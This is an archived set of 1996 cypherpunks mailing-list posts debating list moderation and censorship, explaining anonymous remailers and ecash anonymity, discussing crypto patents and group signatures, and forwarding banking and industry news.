Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611151044.IAA25992@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 ðì 15/11/1996 -0600, snow wrote:
(in the end)...
>     That is what freedom is, the ability to _do it yourself_ not the 
>requirement that others do it for you, or allow you to use what they 
>have already built. 

Hey man, do they sell "FREEDOM KITS" in American Supermarkets? :-)
ROTFL!


(and started saying):
[...]
>> Just as suddenly, the classic anti-free-speech arguments of "if you
>> don't like it, start yer own" begin to surface. (Anyone ever notice
>> how this resembles the "love it or leave it" mentality of certain
>> American patriotic organizations?)
>
>     It still isn't censorship. Censorship, at least in my dictionary, 
>refers to censor, which uses the word "Official" several times.

You mean that if... Dr. Dimitri Vulis hires a Mafia-man to kill ya, 
(to silence you) this wouldn't be censorship, since it would not be
"Official"  ? :-)

>Mr. 
>Gilmore is not an "Official" in a government sense, he maybe in the EFF
>sense, but this is not an "Official" EFF organ, so that doesn't count. 


OK, any bombs thrown in the offices of the Ecological Party are not
official censorship either. It was _unofficial_ censorship by... "Motor
Oil Corporation" trying to stop the Flow of Information (about their
oil leakages polluting the Mediterranean Sea)... See what I mean?



>     He is the OWNER of this list, and the machine it runs on. If he chooses
>(which he didn't) to keep someone from using the list, it is his right.

If I own a building and invite you to an open meeting inside this building
do I own what you _say_ or your rights to _say_ it? 





>     "Editorial Control" means that someone decides who get's published and
>who doesn't. From your opposition to it, I guess you think that a magazine
>dedicated to poetry should print all poems submitted, or as many, selected
>in some sort of non-judgemental order, as they can fit. Or that a magazine
>should print any writings submitted to it. 

See my other posting about why the "Editorial" analogy has serious flaws.

I don't see 'em mailing listes hangin' over the kiosk in the centre of
town, ya know. Nor does the list-ownere make his bread out of 'em. And
finally, we readers aren't as stupid as to forget that we are also the
WRITERS of them mailing listes! :-) :-)




>> Mr. Gilmore, and other like minded parties, might want to consider
>> what would happen if one parent company owned *all* communications
>> media. Would they they be so supportive of the ideology of ownership
>> and communciation they espouse?
>
>     How would this happen? Setting up a press is fairly easy, at least 
>a small hand operated press. Start your own magazine, start your own
>mailing list. 

Bulshit!  If this happened, nobody would exist to allow us to express
ourselvers. Even if we build own "Resistance Movement" (or an alternative
kind of Internet) the damage would be serious and irreversible!

Are you telling us that setting up an entire _PRESS_ is fairly easy?

Listen man, it's not. My printer (who printed the boxes for my software)
will tell you this!  He'll also explain why my major competitor in Greece
owns an entire Printing/Publishing house just for Computer Manuals
(Singular S.A.).

Setting up a mailing list is not _that_ easy, but it's still much more
intricate and difficult than accepting the Basic Principles of Free
Expression: DON'T KICK OUT GUESTS YOU INVITE TO "OPEN MEETINGS".
(In the Internet or anywhere else in fact). If you don't like 'em
guests don't invite them in the first place, or don't call your
meetings "OPEN".

e.g. Just as aga tolerates me and vice versa, so should Gilmore
tolerate Dimitri Vulis. 



Cheers
George





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 15 Nov 1996 08:50:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cryptoanarchy in the field
Message-ID: <199611151647.IAA01227@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 7:35 PM 11/14/1996, Sandy Sandfort wrote:
>On Thu, 14 Nov 1996, yet another John Anonymous MacDonald wrote:
                      ^^^^^^^^^^^

Problem?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Fri, 15 Nov 1996 05:50:21 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Why I shall never undescribe
Message-ID: <3.0.32.19961115085016.00696094@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/enriched

>From: Bovine Remailer <haystack@cow.net>
>To: cypherpunks@toad.com
>
>Foulmouthed Timothy May rehashes his lies like a rabid parrot
>choking on a stale mantra stuck in its poisonous beak.

Where else today can one find such prose?  Nay poetry!

And they say poetry is dead!


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Fri, 15 Nov 1996 07:05:50 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
Message-ID: <328C8654.4813@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


aga wrote:
> 
> No it ain't; not after the list gets so big.  Public newsgroups
> lose all rights of censorship by the owners, and that is law.

Guffaw, guffaw.

(So what if John decided simply to pull the plug on toad in order to
plug in a new hot tub?)

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Fri, 15 Nov 1996 00:08:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP3.0 & ElGamal
Message-ID: <AAA18C4332B@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> I know 3.0 uses discrete log cryptography but whether it will be 
> El Gamal or DH or other I don`t know. I would imagine in the end it 
> would come down to a question of what is unpatented first and I have 
> no idea on the patent date for El Gamal (is it even patented?) but DH 
> hasn`t long to go....

According to Schneier, ElGamal isn't patented, but claimed to be 
covered by the Diffie-Hellman patent, which expires 29 April 1997.

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 15 Nov 1996 09:35:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Water supplies
Message-ID: <199611151729.JAA01932@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



It should be easy to poison a water supply and kill many people.
Yet, this never happens.  Why would this be?

Surely, there are malicious folks who want to do it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 15 Nov 1996 09:29:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ??????????????????????
Message-ID: <199611151729.JAA17912@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 3:57 PM 11/14/1996, newtonm@papa.uncp.edu wrote:
>I have a breif question for all you folks out there.... 
>Does anyone know the email address and procedure for sending your mail via
>"cypherpunks" so that it changes your e-mail address so that the person 
>recieving your e-mail message sees on the mesage that its only from
>an anonymous source?

A customer!  You came to the right place, sir.

We are glad you asked us for assistance and we will do our best to
get you involved in the use of anonymous remailers.  The more people
who know how to use this technology, the better.

An anonymous remailer takes mail and forwards it after removing
identifying information.  However, this is not done by "sending
your mail via "cypherpunks" ".  The cypherpunks is just a mailing
list.  Instead, you send your message to one of the 20 or so
volunteer-run anonymous remailers.

Here are some URLs you may find helpful:

http://www.replay.com/remailer/anon.html
http://www.seattle-webworks.com/pgp/
http://www.stack.urc.tue.nl/~galactus/remailers/
http://www.cs.berkeley.edu/~raph/remailer-list.html

BTW, your subject line "??????????????????????" is likely to generate
hostility.  It is generally considered to be a breach of etiquette to
send a message to a large mailing list without indicating the subject.
For instance, a good topic for this message would have been "Help with
Anonymous Remailers".  Since you are clearly new to the net, I am sure
you did not intend rudeness.

Santa's Little Helper






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 15 Nov 1996 06:35:30 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b01aeb1a0ff57d2@[192.0.2.1]>
Message-ID: <199611151432.JAA26727@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Most of the usual arguments about disallowing anonymity
actually apply to a Parliment.  There is a responsibility involved in
the execution of power.  

	This is not to condone attacking children, or killing ones
political opponents.  For an MP to imply that something he wants to
say will likely get him/his kids killed probably means that he wants
to use the power of the state in some way likely to quite upset at
least a few people.  If this is the case, then allowing him to
anonymously, and without responsibility, direct the power of the state
is congruent to tyranny.

	To answer the technical end of your question, you could build
a DC net where joining required a signed key, or build a mix which
will only accept messages signed by a member of the group.  If the
mixmasters all agree to only accept messages signed by the group, then
each mixmaster can be made a member of the group, and sign its
outbound messages as being recieved with a signature, allowing
anonymous chaining.

Adam

Peter Hendrickson wrote:
| I read awhile ago that certain members of Parliament do not speak
| their mind regarding the situation in Northern Ireland.  The reason
| they give is that they have children and they fear the IRA.
| 
| There are times when one wishes to speak anonymously, yet speak
| as a member of a group.
| 
| Is there a way to take published public keys and combine them with
| your own in such a way that your identity is not compromised, but
| it is clear beyond a doubt that you control one of a set of public
| keys?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 15 Nov 1996 09:42:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: EFF Board, again
Message-ID: <199611151742.JAA20332@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim O'Reilly's been talking publicly about starting a "Sierra Club"
which would "protect" the "environment of the Net".  What does he want
to do?

It might be a way to tell companies what kind of software they can
publish and at what price.  ORA has been having trouble competing with
Microsoft.  Naturally, they cast themselves as altruistic good guys.

Whatever O'Reilly is talking about, it sounds like more trouble from
the general vicinity of the EFF Board.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 15 Nov 1996 13:43:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internet banking: more on Mbanx
Message-ID: <v0300781aaeb232b7b23d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Enzo Michelangeli <enzo@ima.com>
MIME-Version: 1.0
Precedence: Bulk
Date: Fri, 15 Nov 1996 17:28:50 +0800 (hkt)
From: Enzo Michelangeli <enzo@ima.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Re: Internet banking: more on Mbanx

On Fri, 15 Nov 1996, networks@vir.com wrote:

> Unfortunately, their promotional literature does not go
> into their Internet services.  The information I was given over
> the phone was that by signing up they would supply me with
> the 128bit version of Netscape for secure transactions.

People outside of the US may be interested to know that there is a small,
fully legal, free browser with 128-bit SSL security: it's called
WorkHorse, and is available with ftp from ftp.mkt.co.uk (that must have
got a 110 bps feed, if the connection speed is of any indication). The
link inside Banknet's home page, at http://mkn.co.uk/bank/, seems to be
wrong and anyway most browsers time out before getting connected.

WorkHorse's interface is pretty ugly and the rendition is buggy, but the
SSL connection does work: I got through mbanx's "Sign in" link
at http://www.mbanx.com/banxing/5welcome.html , whereas MSIE and NS3 were
kicked out due to their 40-bit RC4 limit.

Enzo




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 15 Nov 1996 07:37:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: ABI_tch
Message-ID: <1.5.4.32.19961115153148.006c67a4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-15-96. WaJo:

   "History of Software Begins With the Work Of Some Brainy
   Women"

      The Army called the women "computers." One day word
      spread that the brightest "computers" were needed to
      work on a new machine called the Eniac, setting dozens
      of dials and plugging a ganglia of heavy black cables
      into the face of the machine, a different configuration
      for every problem -- "programming," they came to call
      it. "The Eniac," says one woman, now 71, "was a son of
      a bitch to program."

   -----

   http://jya.com/abitch.txt  (6 kb)

   ABI_tch







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 15 Nov 1996 10:38:56 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b02aeb235099c35@[192.0.2.1]>
Message-ID: <Pine.3.89.9611151034.A15706-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Peter Hendrickson wrote:

> At 9:32 AM 11/15/1996, Adam Shostack wrote:
> I've been toying with schemes that multiply the Ns from everybody's
> public key to create a new semi-anonymous public key.  The only
> problem is that in each case either identity is revealed or the
> person seeking semi-anonymously reveals their secret key.  So,
> I am not quite there.  ;-)

I think that Chaum wrote some papers on group signatures. I'll try to dig 
them out. But it probably won't be before Sunday.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 15 Nov 1996 08:20:10 -0800 (PST)
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: Taxation Thought Experiment
In-Reply-To: <3.0.32.19961112152531.00a068b0@rpcp.mit.edu>
Message-ID: <Pine.SUN.3.95.961115111117.23903H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think there's some funny accounting here...

On Tue, 12 Nov 1996, Joseph M. Reagle Jr., for whom I have considerable
respect and who ordinarily posts very sensible things but appears to have
lent his account to someone else appeared to have written: 

> o TAXES THOUGHT EXPERIMENT
> 
>  1) I generate $100 of productivity for my company

I will assume you measure productivity by "sales". 

Note also that it's debatable whether this $100 of sales is exactly "your" 
productivity.  In some sense it's really the company's, ie a joint product
of your labor, their capital, and the labor of other people in the
production/sales chain: If you could do it alone, you would, so as to
capture the full benefit yourself.  That is why economists sometimes
measure labor productivity by "salary" on the theory that the market
accurately measures what your output is worth.  

Note also that the analysis that follows is not really affected by whether
you meant "sales"  or "my contribution to the sale". 

>  2) Company is taxed %30, $70 left

No.  Company is NOT taxed on gross sales. Corporate income tax does not
work like sales tax.  With some minor exceptions relating to pass-through
rules, foreign sales, and some complex timing issues, corporate tax is
ordinarily levied on NET PROFITS.  Thus, the company first deducts all the
"costs" it can identify, even if those were not necessarily involved in
producing that (or any) sales.  E.g.  advertising, your salary, corporate
junkets, rent, etc.  And lets not forget corporate tax sheltering too... 

>  3) Company pay shareholders and costs, $30 is left

Again, no.  Shareholders come AFTER payroll and costs.

>  4) Company pays me

See above.

>  5) I pay 40% in taxes, so $18 left

I'm afraid you are conflating the MARGINAL rate (and when you consider
federal, state and local taxes varies by state) with the AVERAGE rate.
Here in FL. for example there is no state or local income tax.  With tax
sheltering, mortgage deductions etc. no one pays 40% -- the middle class
pay a lower average rate, the upper class pay a much lower average rate.

>  6) With $18 I can buy a $16.82 object (%07 sales tax).

By now we are into science fiction.

> 
> Results:
>  1) I see $16.82 realization from $100 productivity increase.
>  * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.

Totally skewed, sorry.  I don't know what the real numbers are, but the
government gets *much* less than this.  I'm sure the aggregate numbers can
be found in the statistical abstract of the U.S. or the council of
economic advisors' annual report to the president, neither of which
happens to be in my office right now.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Fri, 15 Nov 1996 09:54:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961115.103440.9159.1.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times: Tuesday, November 9, 1996 
 
Visa Set to Test 'Electronic Purse' 
 
By George Graham
 
Visa, the international payments card consortium, has picked Leeds for a
trial
next year of its electronic purse, a plastic card with an embedded
computer
chip which can be loaded with cash and used for small purchases.
 
The Visa Cash card was launched last year in the US and widely promoted
this summer in Atlanta during the Olympic Games. Other pilots have been
launched in Argentina, Australia, Canada, Colombia, Hong Kong, New
Zealand and Spain. 
 
The card will clash directly with the UK-developed Mondex card, another
electronic purse about to be taken over by MasterCard. 
 
Mondex is currently on trial in Swindon, and at the universities of
Exeter and
York, and a Hong Kong trial was launched this week. 
 
Visa Cash will be launched by Abbey National, Barclays Bank, the
Co-operative Bank, Halifax Building Society, Lloyds TSB and the Royal
Bank of Scotland.
 
Visa said it did not expect banks to charge customers for the empty card
during the pilot. It hopes that 2,000-3,000 merchants will accept the
card. 
 
Electronic purses are designed to act as a substitute for cash for
regular
purchases such as newspapers or bus tickets. 
 
Because the money is already loaded on the card, a shop can accept it
immediately without a signature or a personal identification number, and
without a telephone call to the bank's computer for authorisation. 
 
That makes them economical for much smaller transactions than a credit or
debit card would be used for. 
 
But ordinary bank cards will soon also contain a computer chip. The
Association for Payment Clearing Services, which runs the UK's payment
systems, plans to start chip card trials next October in Bristol,
Edinburgh and
Northampton. 
 
Banks could start replacing the UK's 90m magnetic strip cards with chip
cards by next summer. 
 
The initial purpose is to produce a card that is harder to counterfeit
than
today's magnetic strip cards. 
 
But extra security features such as electronic signature recognition or
even
biometric keys -- retina scans or palm prints -- could also be loaded on
to
the chip. 
 
Plastic card fraud losses have halved in the last four years to #83.3m
last
year, and many banks now doubt whether chip cards will cut fraud by
enough to justify their extra cost. 
 
But bankers are also intrigued by the potential for using the chip to add
extra
services to their payment cards. 
 
 
American Banker: Wednesday, November 13, 1996
 
Mellon Starts Internet-Based Corporate Service
 
By STEVEN MARJANOVIC
 
Mellon Bank Corp. has launched an Internet-based electronic commerce
service for its corporate customers. 
 
The service, which uses encryption and authentication software from
Premenos Technology Corp. of Concord, Calif., lets corporate customers
send payments and related information to the bank over the Internet using
standard electronic data interchange formats. 
 
The deal is a new example of how banks are slowly growing more confident
about the security of sending sensitive payment and business information
over
the public network. 
 
Mellon says it is confident it can conduct secure transactions over the
open
medium after a six-month "testing" phase of Premenos' security features. 
 
The goal of the pilot was to "try to kill the software," by cracking its
public
key-private key data encryption features, said Mauro DeFelice, manager of
security and technical services at Pittsburgh-based Mellon. 
 
"We wanted to make sure we knew what our risk was," he said. 
 
A rising number of banks are looking to use the Internet as a channel for
corporate banking transactions. 
 
The attraction, according to Lawrence Forman, cash management analyst at
Ernst & Young, is that the Internet is much cheaper than alternatives,
like the
automated clearing house network or value-added private networks. 
 
But he said not all banks are comfortable with the Internet yet. Further,
he
questioned whether Internet security issues have been adequately
addressed,
and noted that many institutions, like Citicorp, remained "very wary of
it." 
 
Encryption measures are still relatively new technologies, Mr. Foreman
noted, and "as volume picks up, the incentive for criminals to break
these
algorithms will grow," he said. 
 
Several banks send and receive EDI payment transmissions over the
Internet,
including BankAmerica Corp., and Banc One Corp. 
 
Chase Manhattan Corp. recently struck a deal with Premenos to conduct
EDI transactions with Diamond Shamrock Inc., an oil refinery based in San
Antonio, Texas. 
 
Mellon's first customer for its new service is Bell Atlantic Corp. 
 
Mellon now issues as many as 10,000 payment and payment-related
transmissions daily. The bank receives files via the Internet, processes
them
with its EDI translation system, and initiates ACH transactions, Fed Wire
electronic funds transfers, or issues checks. 
 
Mellon has offered customers EDI services using payment formats found on
the ACH network for five years. The Internet's advantage, aside from its
ubiquity, is cheaper transmission rates. The deal between Mellon and
Premenos is mutually beneficial. 
 
Mr. DeFelice said the bank, which licensed Premenos' software at a
discount, can offer competitive EDI services to a larger market of
business
customers. Premenos gets access to Mellon's extensive corporate customer
base. 
 
Bell Atlantic at one point wanted to develop EDI software for the
Internet
with Mellon. But it scrapped those plans, opting instead to use software
Premenos had already developed. 
 
  
 
Financial Times: Tuesday, November 12, 1996
 
US Lawyers Turn to Fraud-Busting
 
In murder mysteries, getting rid of the body is the biggest problem.
Fraudsters face a different dilemma: they need to lay their hands on the
spoils
once the hue and cry has calmed. 
 
Two American lawyers have set up a company to prevent them doing just
that. Mr Irving Cohen and Mr Martin Kennedy believe there are enormous
opportunities for recovering money taken illegally. 
 
"The US Treasury has estimated that $ 500bn of off-shore funds are assets
protected from creditors," says Mr Kennedy, who has worked on bad debt
recovery with banks such as CIBC and Bank of Tokyo. The reason the
money is not recovered, he says, is because "there is no understanding
that
deliberately hidden assets can be recovered." 
 
Interclaim plans to take advantage of that with a form of global
factoring. It 
is looking for debts worth at least $ 5m, and with an average value of $
20m. 
 
"This is a completely new kind of company," Mr Kennedy says, "but it is
going to open up a field where there is going to be competition in five
to 10
years." 
 
The reasons large sums lie unrecovered are a combination of financial
services regulations and psychology. A bank faced with a probable bad
debt
is legally required to make provisions, but that act moves the debt from
a
profit centre to the bank's recovery or special loans department. 
 
More crucially, once the provision has been made, the bank and its
shareholders have already accepted the loss; it is written into the
accounts
and the impetus to pursue it is lost. "Institutions have lost their faith
in
traditional methods of recovery," Mr Kennedy say. According to KPMG,
the accountants, such methods usually recover 2-4 per cent of the debt;
Interclaim believes its recovery rates will be closer to 20 per cent. 
 
Part of that success will come from its "find, freeze and settle"
philosophy. It
aims to find the money and freeze the assets, thus immobilising the
fraudster
and bringing him to the settle ment table quickly. 
 
"These individuals are not interested in complying with the rule of law,"
Mr
Irving says. "And we are not interested in grinding through the
legislation for
five or 10 years. If we find someone whose 12-year-old daughter has $ 10m
in her bank account, we can be sure she didn't get that from a paper
round." 
 
The philosophy relies on an understanding of the fraudster and his
assumptions. He is, says Mr Kennedy, not only cunning but arrogant; he
regards his victims with derision. But criminals are also usually
pragmatic. So
when faced with an adversary who outwits them, they capitulate quickly. 
 
Interclaim either buys claims outright for between 0.5 per cent to 6 per
cent
of their value, or works with the institution in a joint venture. It will
spend
between $ 250,000 and $ 500,000 to enforce and prosecute a claim, though
the cost of recovery bears no relation to the size of the claim.
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 15 Nov 1996 10:12:33 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Remailer Abuse Solutions
In-Reply-To: <v02140b05aeb13a70acf4@[192.0.2.1]>
Message-ID: <9611151747.AA00864@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson writes:
>  E-cash, the product licensed by Digicash, offers full payee
>  anonymity and would be an ideal candidate.

Actually, the current impelmentation of ecash only offers _payer_ anonynmity  
and not payee anonymity.  If the payer reveals the blinding factors and/or  
coin numbers to the bank then the payee is caught when attempting to deposit.   
This on purpose, to prevent scenarios such as the kidnapping one from  
actually happening.  The solution, of course, is for the payee to generate and  
blind the coins and order the payer to have them signed.  Money changers are  
another option, but require you to trust them.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@kiwi.cs.berkeley.edu>
Date: Fri, 15 Nov 1996 11:56:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunk chat server
Message-ID: <199611151953.LAA28022@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

   This is to announce the general opening of the cypherpunk Web chat
server. It is at:

      http://kiwi.cs.berkeley.edu:5080/

   For added privacy, there is an SSL version at:

      https://kiwi.cs.berkeley.edu:4433/

   I wrote this server to experiment with asynchronous stream
transformation programming techniques, and for fun. I hope it is of
some benefit to the cypherpunks community.

   Enjoy!

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Nov 1996 09:00:38 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <9611150643.AA01829@vesuvius.ai.mit.edu>
Message-ID: <Pine.LNX.3.95.961115114821.447A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Nov 1996 hallam@vesuvius.ai.mit.edu wrote:

> Since Browne couldn't even manage fourth place, despite the attentions
> of the net it doesn't look as if the US people are particularly 
> inclined to the libertarian view. Nader managed a vote about 20%
> higher despite only running in a handful of states while Browne was
> on the ballot in every state. Contrary to Bellsclaim that the state
> is being challenged by libertarian and millitia ideas it looks to
> me that the tide is flowing in the opposite direction if its flowing
> at all.

Your logic is flawed.  Most registered voters have never even heard of Browne.
Those who have are probably not familiar with his views.  There are definitely
more people who have heard of Nader than Browne.  It's easy to understand why
this logic is incorrect: If Bob ran for president and the only people who voted
for him were three of his friends, this does not necessarily imply that there
are only three people in the entire country who have never heard of him.  It
does imply that Bob needs a lot more exposure.

If Browne's views were not popular, then he would have not been able to get on
the ballot in all 50 states.  Note that the libertarian party is the only
non-mainstream party in history to get a candidate registered in all 50 states
twice in a row.  It's also the third largest political party in the country.
The election turnouts for libertarian candidates for for senate and
representatives were published in many newspapers along with the democratic
and republican turnouts.  It was the only non-demopublican party listed.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoyiDCzIPc7jvyFpAQHe5wf+JqDGzgzAcdBmYoBf5/zOOk6OcyegPRE9
xodMzK58luKVSsq6aJIq11Q3XNeiKBdN9gkxHyEn3h8Xphappko+tZEqQp4SHcb3
HRNA872YFNU58ZWjTKOCRWteWEw3OCoEPq9GIQDf6exOwlVwJZ2qti+uG4ZyQoz1
pnO4nl2SW1zq/5T3Tq49O60slqxE3yFbcEQq75ZRKIISxDyCFLw6uL0hsg5lHYTi
m8V2BQX/STGC981IvxDtoNYsBMVj2EyZChVS0wqHmfn5b/KexisaeB1OO8Nq/DJ/
m5X1s3mk5gfVwwwHLIX84VsxQr/TrGTiV+GICOfc/miCUylGG/ZAFw==
=gisl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 15 Nov 1996 12:05:10 -0800 (PST)
To: cypherpunks, declan@eff.org, gnu
Subject: HP announcing some International Cryptography stuff on Monday
Message-ID: <199611152005.MAA16893@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Are they the next Big Company to knuckle under to the Feds?  Their
pcmcia-with-local-country-surveillance-chip-socket initiative never
seemed to go anywhere.

 PALO ALTO, Calif.(BUSINESS WIRE)Nov. 15, 1996 Hewlett-Packard Company 
today announced that Lewis E. Platt, HP chairman, president and chief 
executive officer, will host a press and analyst event on Monday, Nov. 
18, that will showcase the fact that a significant barrier to conducting 
secured business transactions and communications over the Internet has 
been cleared. 
   Expected to join Platt at the International Cryptography Framework 
announcement are Brad Silverberg, senior vice president of Microsoft(R)'s 
Internet Platform and Tools Division, and Ron Smith, senior vice 
president and general manager of Intel's Semiconductor Products Group. 
   The event will be held at 9:30 a.m. (registration at 9:00 a.m.) in the 
White and Murrow Rooms of the National Press Club, 529 14th Street N.W., 
Washington. 
   Members of the press and analysts should contact HP's Lisa 
Arruiza-DeLeon at 408/447-5331 to register for an event that will 
showcase an approach to solving the data security and integrity issues 
that have impaired and frightened users and companies from exploiting the 
full power of the Internet. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Nov 1996 09:03:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <AAA18C4332B@frw3.kub.nl>
Message-ID: <Pine.LNX.3.95.961115120321.447B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Nov 1996, Bert-Jaap Koops wrote:

> paul@fatmans.demon.co.uk wrote:
> > I know 3.0 uses discrete log cryptography but whether it will be 
> > El Gamal or DH or other I don`t know. I would imagine in the end it 
> > would come down to a question of what is unpatented first and I have 
> > no idea on the patent date for El Gamal (is it even patented?) but DH 
> > hasn`t long to go....
> 
> According to Schneier, ElGamal isn't patented, but claimed to be 
> covered by the Diffie-Hellman patent, which expires 29 April 1997.

Actually, it expires in either September or October of 1997.  The expiration
time of patents was changed from 17 after it is issued to 20 years after
application.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoyi7yzIPc7jvyFpAQGhyAgAzdXoWBPJ6ZJPvU1Wksya1BmIYnq6owb2
vhOFWeDNuWX/X7m16dOlr4kdRCD7vV8ErOZXvgga0NSHqlKSJ2HD4gmFnFJLuZKn
OSh/mNRkkPKR4UypIjgnj4nLPTVkswldXFvJ43NGb2tJ25f/GjecZNQTDBaomcdZ
ZLExK4i/nY/xCY1N+If/gTzSPNgL/zldWQkc12M1Nn2dHPe7b74GFsUWEN7zgKnG
W5wdj7yzD9s6n1Jyk5zl8bDC386AchXqY1ikeaDU2CduEHNQjGWApWiPEJUZGRxJ
u77piV/dtjaecYlVxui91GnJ9VVRbDbPMaMNhbZrAGexTXXxKBnHbQ==
=vfjp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Fri, 15 Nov 1996 12:16:47 -0800 (PST)
To: "'aga'" <aga@dhp.com>
Subject: RE: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961115201523Z-5419@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Aga wrote:
> > >Why?  Are you a criminal?
